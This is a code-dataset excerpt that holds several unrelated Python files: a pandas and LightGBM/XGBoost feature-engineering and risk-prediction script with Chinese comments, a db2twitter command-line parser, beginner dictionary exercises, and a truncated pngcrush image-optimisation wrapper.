breakfaith['sxenddate'].apply(lambda x: x.replace('年','-').replace('月','') if type(x) is str else x)\nlawsuit['lawdate'] = lawsuit['lawdate'].apply(lambda x: x.replace('年','-').replace('月',''))\nrecruit['pnum'] = recruit['pnum'].apply(lambda x: x.replace('若干','').replace('人','') if type(x) is str else x)\ntrain.rename(columns={'target':'label'},inplace=True)\n\nprint('覆盖原来数据')\nentbase.to_csv(data_path + '1entbase.csv',index=False,encoding='utf-8')\nalter.to_csv(data_path + '2alter.csv',index=False,encoding='utf-8')\nbranch.to_csv(data_path + 
'3branch.csv',index=False,encoding='utf-8')\ninvest.to_csv(data_path + '4invest.csv',index=False,encoding='utf-8')\nright.to_csv(data_path + '5right.csv',index=False,encoding='utf-8')\nproject.to_csv(data_path + '6project.csv',index=False,encoding='utf-8')\nlawsuit.to_csv(data_path + '7lawsuit.csv',index=False,encoding='utf-8')\nbreakfaith.to_csv(data_path + '8breakfaith.csv',index=False,encoding='utf-8')\nrecruit.to_csv(data_path + '9recruit.csv',index=False,encoding='utf-8')\nqualification.to_csv(data_path + '10qualification.csv',index=False,encoding='utf-8')\ntest.to_csv(data_path + 'evaluation_public.csv',index=False,encoding='utf-8')\ntrain.to_csv(data_path + 'train.csv',index=False,encoding='utf-8')\n\n#################################### 构造特征 #######################################\n\nglobal data_path\ncache_path = 'F:/liangzi_cache/'\nnew = False\n\n# 获取阈值\ndef get_threshold(preds):\n preds_temp = sorted(preds,reverse=True)\n n = sum(preds) # 实际正例个数\n m = 0 # 提交的正例个数\n e = 0 # 正确个数的期望值\n f1 = 0 # f1的期望得分\n for threshold in preds_temp:\n e += threshold\n m += 1\n f1_temp = e/(m+n)\n if f1>f1_temp:\n break\n else:\n f1 = f1_temp\n print('阈值为:{}'.format(threshold))\n print('提交正例个数为:{}'.format(m-1))\n print('期望得分为:{}'.format(f1*2))\n return [(1 if (pred>threshold) else 0) for pred in preds]\n\n# 合并节约内存\ndef concat(L):\n result = None\n for l in L:\n if result is None:\n result = l\n else:\n result[l.columns.tolist()] = l\n return result\n\n# 分组标准化\ndef grp_standard(data,key,names):\n for name in names:\n mean_std = data.groupby(key, as_index=False)[name].agg({'mean': 'mean',\n 'std': 'std'})\n data = data.merge(mean_std, on=key, how='left')\n data[name] = ((data[name]-data['mean'])/data['std']).fillna(0)\n data[name] = data[name].replace(-np.inf, 0)\n data.drop(['mean','std'],axis=1,inplace=True)\n return data\n\n# 分组归一化\ndef grp_normalize(data,key,names,start=0):\n for name in names:\n max_min = data.groupby(key,as_index=False)[name].agg({'max':'max',\n 
'min':'min'})\n data = data.merge(max_min,on=key,how='left')\n data[name] = (data[name]-data['min'])/(data['max']-data['min'])\n data[name] = data[name].replace(-np.inf, start)\n data.drop(['max','min'],axis=1,inplace=True)\n return data\n\n# 分组排序\ndef grp_rank(data,key,names,ascending=True):\n for name in names:\n data.sort_values([key, name], inplace=True, ascending=ascending)\n data['rank'] = range(data.shape[0])\n min_rank = data.groupby(key, as_index=False)['rank'].agg({'min_rank': 'min'})\n data = pd.merge(data, min_rank, on=key, how='left')\n data['rank'] = data['rank'] - data['min_rank']\n data[names] = data['rank']\n data.drop(['rank'],axis=1,inplace=True)\n return data\n\n\n# 基础特征\ndef get_base_feat(stat,data,data_key):\n def id_convert(x):\n if 'p' in x:\n return -1\n if 's' in x:\n return 0 if int(x[1:])<500000 else 1\n else:\n return 0 if int(x) < 500000 else 1\n entbase = pd.read_csv(data_path + '1entbase.csv').fillna(-1)\n # stat_temp = stat.merge(entbase,on='id',how='left')\n feat = data.merge(entbase,on='id',how='left')\n feat['hy_count'] = feat['hy'].map(stat['hy'].value_counts())\n feat['etype_count'] = feat['etype'].map(stat['etype'].value_counts())\n feat['ienum'] = feat['inum'] - feat['enum']\n feat['rgyear'] = 2020 - feat['rgyear']\n # feat['zczb2'] = feat['zczb'] * (1.14 ** feat['rgyear'])\n feat['finzb2'] = feat['finzb'] / (feat['zczb'] + 0.1)\n feat['mpnum2'] = feat['mpnum'] / (feat['zczb'] + 0.1)\n feat['inum2'] = feat['inum'] / (feat['zczb'] + 0.1)\n feat['fstinum2'] = feat['fstinum'] / (feat['zczb'] + 0.1)\n feat['tzinum2'] = feat['tzinum'] / (feat['zczb'] + 0.1)\n feat['sumnum'] = feat[['mpnum','inum','fstinum','tzinum']].sum(axis=1)\n hy = pd.get_dummies(feat['hy'], prefix='hy')\n feat = pd.concat([feat,hy],axis=1)\n etype = pd.get_dummies(feat['etype'], prefix='etype')\n feat = pd.concat([feat, etype], axis=1)\n feat['id_feat'] = feat['id'].apply(id_convert)\n feat.fillna(0,inplace=True)\n 
feat.drop(['id','label'],axis=1,inplace=True)\n return feat\n\n# alter特征\ndef get_alter_feat(data,data_key):\n alter = pd.read_csv(data_path + '2alter.csv')\n alter['altdate'] = alter['altdate'].apply(lambda x:(2016-int(x[:4]))*12 - int(x[-2:]))\n alter.sort_values('altdate', ascending=True, inplace=True)\n n_alter = alter.groupby('id',as_index=False)['alterno'].agg({'n_alter':'size'})\n alterno = pd.get_dummies(alter['alterno'], prefix='alterno')\n alterno = pd.concat([alter[['id']], alterno], axis=1)\n alterno = alterno.groupby(['id'], as_index=False).sum()\n alter_first = alter.drop_duplicates('id',keep='first').rename(columns={'altdate':'altdate_first'})\n alter_last = alter.drop_duplicates('id', keep='last').rename(columns={'altdate':'altdate_last'})\n # alterno_time = alter.drop_duplicates(['id','alterno'], keep='last')[['id','alterno','altdate']]\n # alterno_time = alterno_time.set_index(['id','alterno']).unstack()\n # alterno_time.columns = alterno_time.columns.droplevel(0)\n # alterno_time = alterno_time.add_prefix('alterdate_').reset_index()\n # alter_money = alter[~alter['altbe'].isnull()].drop_duplicates('id', keep='first')\n # alter_money['alter_money'] = alter_money['altaf'] - alter_money['altbe']\n # alter_money['alter_rate'] = alter_money['alter_money'] / (alter_money['altbe']+0.1)\n feat = data.merge(n_alter, on='id', how='left').fillna(0)\n feat = feat.merge(alterno, on='id', how='left').fillna(0)\n # feat = feat.merge(alterno_time, on='id', how='left').fillna(0)\n feat = feat.merge(alter_first[['id', 'alterno', 'altdate_first']], on='id', how='left').fillna(-1)\n feat = feat.merge(alter_last[['id', 'altdate_last']], on='id', how='left').fillna(-1)\n # feat = feat.merge(alter_money[['id', 'alter_money', 'alter_rate','altbe']],on='id', how='left').fillna(-100000)\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# branch特征\ndef get_branch_feat(data,data_key):\n branch = pd.read_csv(data_path + '3branch.csv')\n 
branch['branch_active_year'] = branch['b_endyear'] - branch['b_reyear']\n feat = branch.groupby('id').agg({'b_endyear': {'n_branch': 'size',\n 'n_end_branch': 'count',\n 'last_end_branch': 'max',\n 'median_end_branch': 'median'},\n 'ifhome': {'n_home_branch': 'sum'},\n 'b_reyear': {'last_start_branch': 'max',\n 'first_start_branch': 'min'},\n 'branch_active_year': {'branch_active_year':'mean'}})\n feat.columns = feat.columns.droplevel(0)\n feat['id'] = feat.index\n feat['n_active_branch'] = feat['n_branch'] - feat['n_end_branch']\n feat['n_outer_branch'] = feat['n_branch'] - feat['n_home_branch']\n feat['active_branch_rate'] = feat['n_active_branch'] / (feat['n_branch'] + 0.1)\n feat['home_brach_rate'] = feat['n_home_branch'] / (feat['n_branch'] + 0.1)\n feat = data.merge(feat,on='id',how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# invest特征\ndef get_invest_feat(data,data_key):\n invest = pd.read_csv(data_path + '4invest.csv')\n # invest = invest[invest['id'] != invest['bteid']]\n train = pd.read_csv(data_path + 'train.csv')\n id_label_dict = dict(zip(train['id'].values,train['label'].values))\n invest['btlabel'] = invest['bteid'].map(id_label_dict)\n invest['idlabel'] = invest['id'].map(id_label_dict)\n n_invest = invest.groupby('id',as_index=False)['id'].agg({'n_invest':'count'})\n mean_btbl = invest.groupby('id', as_index=False)['btbl'].agg({'mean_btbl': 'mean'})\n sum_btbl = invest.groupby('id', as_index=False)['btbl'].agg({'sum_btbl': 'sum'})\n n_home_invest = invest.groupby('id', as_index=False)['ifhome'].agg({'n_home_invest': 'sum'})\n n_negitive_invest = invest.groupby('id', as_index=False)['btlabel'].agg({'n_negitive_invest': 'sum'})\n n_negitive_invest2 = invest.groupby('id', as_index=False)['btendyear'].agg({'n_negitive_invest2': 'count'})\n n_negitive_invested = invest.groupby('bteid', as_index=False)['idlabel'].agg({'n_negitive_invested': 'sum'})\n n_negitive_invested.rename(columns={'bteid':'id'},inplace=True)\n 
last_invest = invest.groupby('id',as_index=False)['btyear'].agg({'last_invest':'max'})\n last_negitive_invest = invest.groupby('id', as_index=False)['btendyear'].agg({'last_negitive_invest': 'max'})\n bt_invest = invest[['bteid','btyear','btendyear','btbl']].rename(columns={'bteid':'id'})\n bt_invest = bt_invest.groupby('id',as_index=False).max()\n feat = data.merge(n_invest, on='id', how='left')\n feat = feat.merge(n_home_invest, on='id', how='left')\n feat = feat.merge(mean_btbl, on='id', how='left')\n feat = feat.merge(sum_btbl, on='id', how='left')\n feat = feat.merge(n_negitive_invest, on='id', how='left')\n feat = feat.merge(n_negitive_invest2, on='id', how='left')\n feat = feat.merge(n_negitive_invested, on='id', how='left')\n feat = feat.merge(last_invest, on='id', how='left')\n feat = feat.merge(last_negitive_invest, on='id', how='left')\n feat = feat.merge(bt_invest, on='id', how='left')\n feat['home_invest_rate'] = feat['n_home_invest'] / (feat['n_invest']+0.1)\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# right特征\ndef get_right_feat(data, data_key):\n right = pd.read_csv(data_path + '5right.csv')\n nunique_right = right.groupby('id', as_index=False)['righttype'].agg({'nunique_right': 'nunique'})\n n_right1 = right[(right['askdate'] > '2012')].groupby('id', as_index=False)['righttype'].agg({'n_right1': 'count'})\n right['fbdate'] = right['fbdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[-2:]))\n right['weight'] = right['askdate'].apply(lambda x:0.5**(2015-int(x[:4])))\n right['askdate'] = right['askdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[-2:]))\n n_right = right.groupby('id', as_index=False)['id'].agg({'n_right': 'count'})\n n_right2 = right.groupby('id',as_index=False)['weight'].agg({'n_right2':'sum'})\n n_right3 = right.groupby('id', as_index=False)['fbdate'].agg({'n_right3': 'count'})\n righttype = pd.get_dummies(right['righttype'], prefix='righttype')\n 
righttype = pd.concat([right['id'], righttype], axis=1)\n righttype = righttype.groupby(['id'], as_index=False).sum()\n last_fbdate = right.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'min'})\n last_askdate = right.groupby('id', as_index=False)['askdate'].agg({'last_askdate': 'min'})\n feat = data.merge(n_right, on='id', how='left')\n feat = feat.merge(n_right2, on='id', how='left')\n feat = feat.merge(n_right3, on='id', how='left')\n feat = feat.merge(nunique_right, on='id', how='left')\n feat = feat.merge(n_right1, on='id', how='left')\n feat = feat.merge(righttype, on='id', how='left')\n feat = feat.merge(last_fbdate, on='id', how='left')\n feat = feat.merge(last_askdate, on='id', how='left')\n feat['n_right4'] = feat['n_right'] - feat['n_right3']\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# project特征\ndef get_project_feat(data, data_key):\n project = pd.read_csv(data_path + '6project.csv')\n project['djdate'] = project['djdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[5:7]))\n feat = project.groupby('id',as_index=False)['djdate'].agg({'n_project':'count',\n 'max_dfdate':'min',\n 'min_dfdate':'max',\n 'mean_dfdate': 'mean'})\n feat = data.merge(feat,on='id',how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n\n# lawsuit特征\ndef get_lawsuit_feat(data, data_key):\n lawsuit = pd.read_csv(data_path + '7lawsuit.csv')\n lawsuit.drop_duplicates(['id','lawdate','lawamount'],inplace=True)\n n_lawsuit = lawsuit.groupby('id', as_index=False)['id'].agg({'n_lawsuit': 'size'})\n sum_lawsuit_money = lawsuit.groupby('id', as_index=False)['lawamount'].agg({'lawamount': 'sum'})\n lawsuit['lawdate'] = lawsuit['lawdate'].apply(lambda x:(2016-int(x[:4]))*12 - int(x[-2:]))\n last_lawsuit_date = lawsuit.groupby('id', as_index=False)['lawdate'].agg({'last_lawsuit_date': 'min'})\n feat = data.merge(n_lawsuit, on='id', how='left')\n feat = feat.merge(sum_lawsuit_money, on='id', 
how='left')\n feat = feat.merge(last_lawsuit_date, on='id', how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# breakfaith特征\ndef get_breakfaith_feat(data, data_key):\n breakfaith = pd.read_csv(data_path + '8breakfaith.csv')\n breakfaith['fbdate'] = pd.to_datetime(breakfaith['fbdate']).apply(lambda x: (2016-x.year)*12 + x.month)\n breakfaith.drop_duplicates(['id', 'fbdate'], inplace=True)\n n_breakfaith = breakfaith.groupby('id', as_index=False)['id'].agg({'n_breakfaith': 'size'})\n last_fbdate = breakfaith.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'min'})\n first_fbdate = breakfaith.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'max'})\n feat = data.merge(n_breakfaith, on='id', how='left')\n feat = feat.merge(last_fbdate, on='id', how='left')\n feat = feat.merge(first_fbdate, on='id', how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# recruit特征\ndef get_recruit_feat(data, data_key):\n recruit = pd.read_csv(data_path + '9recruit.csv')\n recruit['recdate'] = recruit['recdate'].apply(lambda x: (2016 - int(x[:4])) * 12 - int(x[-2:]))\n # breakfaith.drop_duplicates(['id', 'fbdate'], inplace=True)\n n_recruit = recruit.groupby('id', as_index=False)['id'].agg({'n_recruit': 'size'})\n nunique_recruit = recruit.groupby('id', as_index=False)['poscode'].agg({'nunique_recruit': 'nunique'})\n sum_recruit_people = recruit.groupby('id', as_index=False)['pnum'].agg({'sum_recruit_people': 'sum',\n 'max_pnum':'max',\n 'mean_pnum':'mean'})\n last_lawsuit_date = recruit.groupby('id', as_index=False)['recdate'].agg({'last_lawsuit_date': 'min'})\n wzcode = recruit.groupby(['id','wzcode'])['pnum'].sum().unstack().reset_index()\n feat = data.merge(n_recruit, on='id', how='left')\n feat = feat.merge(nunique_recruit, on='id', how='left')\n feat = feat.merge(sum_recruit_people, on='id', how='left')\n feat = feat.merge(last_lawsuit_date, on='id', how='left')\n feat = feat.merge(wzcode, on='id', 
how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\ndef get_qualification_feat(data, data_key):\n qualification = pd.read_csv(data_path + '10qualification.csv', encoding='gb2312')\n n_qualification = qualification.groupby('id',as_index=False)['addtype'].agg({'n_qua':'count'})\n feat = data.merge(n_qualification,on='id',how='left')\n return feat\n\n\n\n# 二次处理特征\ndef second_feat(result):\n return result\n\n# 获取样本标签\ndef get_labels(data):\n train = pd.read_csv(r'C:/Users/csw/Desktop/python/liangzi/data/concat_data/train.csv')\n label_dict = dict(zip(train['id'].values,train['label'].values))\n data['label'] = data['id'].map(label_dict)\n return data\n\n# 构造训练集\ndef make_set(stat,data,path):\n global data_path\n data_path = path\n t0 = time.time()\n data_key = hashlib.md5(data.to_string().encode()).hexdigest()\n print('数据key为:{}'.format(data_key))\n result_path = cache_path + 'feat_set_{}.hdf'.format(data_key)\n if os.path.exists(result_path) & 0:\n result = pd.read_hdf(result_path, 'w')\n else:\n data.index = list(range(len(data.index)))\n entbase = pd.read_csv(data_path + '1entbase.csv').fillna(0)\n stat = stat.merge(entbase,on='id',how='left')\n print('开始构造特征...')\n base_feat = get_base_feat(stat, data,data_key) # 添加基础特征\n alter_feat = get_alter_feat(data,data_key) # alter特征\n branch_feat = get_branch_feat(data,data_key) # branch特征\n invest_feat = get_invest_feat(data,data_key) # invest特征\n right_feat = get_right_feat(data, data_key) # right特征\n project_feat = get_project_feat(data, data_key) # project特征\n lawsuit_feat = get_lawsuit_feat(data, data_key) # lawsuit特征\n breakfaith_feat = get_breakfaith_feat(data, data_key) # breakfaith特征\n recruit_feat = get_recruit_feat(data, data_key) # recruit特征\n # qualification_feat = get_qualification_feat(data, data_key)# qualification特征\n\n result = concat([data[['id']],base_feat,alter_feat ,branch_feat,invest_feat,right_feat,\n project_feat,lawsuit_feat,breakfaith_feat,recruit_feat\n ])\n result = 
get_labels(result)\n result = second_feat(result)\n result.to_hdf(result_path, 'w', complib='blosc', complevel=5)\n print('特征矩阵大小:{}'.format(result.shape))\n print('生成特征一共用时{}秒'.format(time.time() - t0))\n return result\n\n\n##################################### lgb重采样预测 ############################\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.cross_validation import KFold\n\nprint('读取train数据...')\ndata_path = 'C:/Users/csw/Desktop/python/liangzi/data/'\ncache_path = 'F:/liangzi_cache/'\n\ntrain = pd.read_csv(data_path + 'train.csv')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntest['label'] = np.nan\n\nprint('构造特征...')\ntrain_feat_temp = make_set(train,train,data_path)\ntest_feat = make_set(train,test,data_path)\nsumbmission = test_feat[['id']].copy()\n\npredictors = [f for f in train_feat_temp.columns if f not in ['id','label','enddate']]\n\ntrain_feat = train_feat_temp.append(train_feat_temp[train_feat_temp['prov']==11])\ntrain_feat = train_feat.append(train_feat_temp[train_feat_temp['prov']==11])\nprint('开始CV 5折训练...')\nscores = []\nt0 = time.time()\nmean_score = []\ntrain_preds = np.zeros(len(train_feat))\ntest_preds11 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n lgb_train = lgb.Dataset(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n lgb_test = lgb.Dataset(train_feat[predictors].iloc[test_index], train_feat['label'].iloc[test_index])\n\n params = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc',\n 'num_leaves': 150,\n 'learning_rate': 0.01,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'feature_fraction': 0.8,\n 'bagging_fraction': 0.95,\n 'bagging_freq': 5,\n 'verbose': -1,\n 'seed': 100,\n }\n gbm = lgb.train(params, lgb_train, 900)\n train_preds_sub = gbm.predict(train_feat[predictors].iloc[test_index])\n 
train_preds[test_index] += train_preds_sub\n test_preds_sub = gbm.predict(test_feat[predictors])\n test_preds11 += test_preds_sub\n\n score = roc_auc_score(train_feat['label'].iloc[test_index],train_preds_sub)\n scores.append(score)\n print('第{0}轮mae的得分: {1}'.format(i + 1, score))\ntest_preds11 = test_preds11/5\nprint('auc平均得分: {}'.format(np.mean(scores)))\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\nprint('开始CV 5折训练...')\ntrain_feat = train_feat_temp.append(train_feat_temp[(train_feat_temp['prov']==12)])\ntrain_feat = train_feat.append(train_feat_temp[(train_feat_temp['prov']==12)])\nscores = []\nt0 = time.time()\nmean_score = []\ntrain_preds = np.zeros(len(train_feat))\ntest_preds12 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n lgb_train = lgb.Dataset(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n lgb_test = lgb.Dataset(train_feat[predictors].iloc[test_index], train_feat['label'].iloc[test_index])\n\n params = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc',\n 'num_leaves': 150,\n 'learning_rate': 0.01,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'feature_fraction': 0.8,\n 'bagging_fraction': 0.95,\n 'bagging_freq': 5,\n 'verbose': -1,\n 'seed': 100,\n }\n gbm = lgb.train(params, lgb_train, 900)\n train_preds_sub = gbm.predict(train_feat[predictors].iloc[test_index])\n train_preds[test_index] += train_preds_sub\n test_preds_sub = gbm.predict(test_feat[predictors])\n test_preds12 += test_preds_sub\n\n score = roc_auc_score(train_feat['label'].iloc[test_index],train_preds_sub)\n scores.append(score)\n print('第{0}轮mae的得分: {1}'.format(i + 1, score))\ntest_preds12 = test_preds12/5\nprint('auc平均得分: {}'.format(np.mean(scores)))\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\ntest_feat['pred11'] = test_preds11\ntest_feat['pred12'] = test_preds12\ntest_feat['pred'] = 
test_feat.apply(lambda x: x.pred11 if x.prov==11 else x.pred12, axis=1)\npreds_scatter = get_threshold(test_feat['pred'].values)\nsubmission = pd.DataFrame({'EID':sumbmission['id'],'FORTARGET':preds_scatter,'PROB':1-test_feat['pred'].values})\nsubmission.to_csv(r'C:\\Users\\csw\\Desktop\\python\\liangzi\\submission\\sub{}.csv'.format(datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False, float_format='%.4f')\n\n\n\n\n\n\n\n\n\n\n################################## xgb重采样 ################################\nimport xgboost\n\nprint('读取train数据...')\ndata_path = 'C:/Users/csw/Desktop/python/liangzi/data/'\ncache_path = 'F:/liangzi_cache/'\n\ntrain = pd.read_csv(data_path + 'train.csv')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntest['label'] = np.nan\n\nprint('构造特征...')\ntrain_feat_temp = make_set(train,train,data_path)\ntest_feat = make_set(train,test,data_path)\nsumbmission = test_feat[['id']].copy()\n\ntrain_feat = train_feat_temp.append(train_feat_temp[train_feat_temp['prov']==11])\ntrain_feat = train_feat.append(train_feat_temp[train_feat_temp['prov']==11])\npredictors = train_feat.columns.drop(['id','label','enddate','hy_16.0', 'hy_91.0', 'hy_94.0'])\n\nprint('开始CV 5折训练...')\nscores = []\nt0 = time.time()\ntest_preds11 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n xgb_train = xgboost.DMatrix(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n xgb_eval = xgboost.DMatrix(test_feat[predictors])\n\n xgb_params = {\n \"objective\": \"reg:logistic\"\n , \"eval_metric\": \"auc\"\n , \"eta\": 0.01\n , \"max_depth\": 12\n , \"min_child_weight\": 10\n , \"gamma\": 0.70\n , \"subsample\": 0.76\n , \"colsample_bytree\": 0.95\n , \"alpha\": 2e-05\n , \"lambda\": 10\n }\n bst = xgboost.train(params=xgb_params,dtrain=xgb_train,num_boost_round=1200)\n test_preds_sub = bst.predict(xgb_eval)\n test_preds11 += 
test_preds_sub\n\ntest_preds11 = test_preds11/5\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\nprint('开始CV 5折训练...')\ntrain_feat = train_feat_temp.append(train_feat_temp[(train_feat_temp['prov']==12)])\ntrain_feat = train_feat.append(train_feat_temp[(train_feat_temp['prov']==12)])\nt0 = time.time()\ntest_preds12 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n xgb_train = xgboost.DMatrix(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n xgb_eval = xgboost.DMatrix(test_feat[predictors])\n\n xgb_params = {\n \"objective\": \"reg:logistic\"\n , \"eval_metric\": \"auc\"\n , \"eta\": 0.01\n , \"max_depth\": 12\n , \"min_child_weight\": 10\n , \"gamma\": 0.70\n , \"subsample\": 0.76\n , \"colsample_bytree\": 0.95\n , \"alpha\": 2e-05\n , \"lambda\": 10\n }\n bst = xgboost.train(params=xgb_params, dtrain=xgb_train, num_boost_round=1200)\n test_preds_sub = bst.predict(xgb_eval)\n test_preds12 += test_preds_sub\n\ntest_preds12 = test_preds12/5\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\ntest_feat['pred11'] = test_preds11\ntest_feat['pred12'] = test_preds12\ntest_feat['pred'] = test_feat.apply(lambda x: x.pred11 if x.prov==11 else x.pred12, axis=1)\npreds_scatter = get_threshold(test_feat['pred'].values)\nsubmission = pd.DataFrame({'EID':sumbmission['id'],'FORTARGET':preds_scatter,'PROB':test_feat['pred'].values})\nsubmission.to_csv(r'C:\\Users\\csw\\Desktop\\python\\liangzi\\submission\\sub{}.csv'.format(datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"liangzi/piupiu_fengxian.py","file_name":"piupiu_fengxian.py","file_ext":"py","file_size_in_byte":29148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154904474","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015-2017 Carl Chenet \n# This program is free software: you can 
redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n\n# CLI parsing\n'''CLI parsing'''\n\n# standard libraries imports\nfrom argparse import ArgumentParser\nimport os.path\nimport sys\n\nclass CliParse:\n '''CliParse class'''\n def __init__(self):\n '''Constructor for the CliParse class'''\n self.epilog = 'For more information: https://db2twitter.readthedocs.io'\n self.description = 'db2twitter automatically extracts fields from your database, use them to feed a template of tweet and send the tweet'\n self.main()\n\n def main(self):\n '''main of CliParse class'''\n parser = ArgumentParser(prog='db2twitter',\n description=self.description,\n epilog=self.epilog)\n parser.add_argument('pathtoconf', metavar='FILE', type=str,\n help='the path to the retweet configuration')\n parser.add_argument('-c', '--circle', action='store_true',\n default=False, help='circling the last tweets')\n parser.add_argument('--dry-run', dest='dryrun', action='store_true',\n default=False, help='simulate the execution, no tweet sent')\n self.cliargs = parser.parse_args()\n if not os.path.exists(self.cliargs.pathtoconf):\n sys.exit('the path you provided for db2twitter configuration file does not exist')\n if not os.path.isfile(self.cliargs.pathtoconf):\n sys.exit('the path you provided for db2twitter configuration is not a file')\n\n @property\n def args(self):\n '''return the cli arguments'''\n return 
self.cliargs\n","sub_path":"db2twitter/cliparse.py","file_name":"cliparse.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503910991","text":"# Dictionaries\n# 1. Exercise 1\nphonebook_dict = {\n 'Alice': '703-493-1834',\n 'Bob': '857-384-1234',\n 'Elizabeth': '484-584-2923'\n}\nprint(\"Elizabeth's phone number is:\",phonebook_dict['Elizabeth'])\nphonebook_dict['Kareem'] = '938-489-1234'\nprint(\"Kareem's phone number is:\", phonebook_dict['Kareem'])\ndel phonebook_dict['Alice']\nphonebook_dict['Bob']='968-345-2345'\nprint(\"The phonebook dictionary consists of the following keys:\", phonebook_dict.keys())\nprint(\"The phonebook dictionary consists of the following values/numbers:\", phonebook_dict.values())\nprint(\"The phonebook dictionary consists of the following items:\", phonebook_dict.items())\n\n\n# Exercise 2: Nested Dictionaries\nramit = {\n 'name': 'Ramit',\n 'email': 'ramit@gmail.com',\n 'interests': ['movies', 'tennis'],\n 'friends': [\n {\n 'name': 'Jasmine',\n 'email': 'jasmine@yahoo.com',\n 'interests': ['photography', 'tennis']\n },\n {\n 'name': 'Jan',\n 'email': 'jan@hotmail.com',\n 'interests': ['movies', 'tv']\n }\n ]\n}\nprint(\"Ramit's email is:\",ramit['email'])\nprint(\"Ramit's first interest is:\", ramit['interests'][0])\nprint(\"Jasmine's email is:\",ramit['friends'][0]['email'])\nprint(\"The second of Jan's two interests is:\",ramit['friends'][1]['interests'][1])\n\n# Exercise 3: Letter Summary \n#s = \"banana\"\n\ndef letter_histogram(str1):\n dict = {}\n for n in str1: # treating the string as an array vs the second exercise where we are creating the array first\n keys = dict.keys()\n if n in keys:\n dict[n] += 1\n else:\n dict[n] = 1\n return dict\nprint(letter_histogram('banana'))\n\n## Need to review \n# Exercise 4: Word Summary \ndef word_histogram(text):\n text = text.lower()\n word_dict = {}\n word_list = text.replace('\\n', ' 
').replace('.',' ').split(' ')\n for word in word_list:\n if word in word_dict:\n word_dict[word] += 1\n else: \n word_dict[word]=1\n return(word_dict)\n\nif __name__ ==\"__main__\": # this is to not allow running the function when the file is imported\n text = input(\"Please give me a sentence\")\n print(word_histogram(text))\n \n\n \n \n \n \n \n ","sub_path":"PythonPart3_Dic_IO.py","file_name":"PythonPart3_Dic_IO.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499241027","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2014 deanishe@deanishe.net\n#\n# MIT Licence. See http://opensource.org/licenses/MIT\n#\n# Created on 2014-11-10\n#\n\n\"\"\"\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals, absolute_import\n\nimport os\nimport subprocess\nimport sys\n\n\ndef pngcrush(filepath):\n \"\"\"Run file through `pngcrush` and return SHA1 hash\"\"\"\n name, ext = os.path.splitext(filepath)\n temppath = '{}.{}{}'.format(name, os.getpid(), ext)\n size_in = os.stat(filepath).st_size\n os.rename(filepath, temppath)\n cmd = [\n 'pngcrush',\n '-rem', 'allb',\n '-m', '10',\n '-q',\n '-reduce',\n temppath,\n filepath,\n ]\n subprocess.call(cmd)\n if os.path.exists(filepath) and os.path.exists(temppath):\n os.unlink(temppath)\n size_out = os.stat(filepath).st_size\n pc = (float(size_out) / size_in) * 100\n print('Optimised [{:4d}b / {:0.1f}%] `{}`'.format(\n size_out, pc, filepath), file=sys.stderr)\n\n\ndef main():\n if not len(sys.argv) == 2:\n 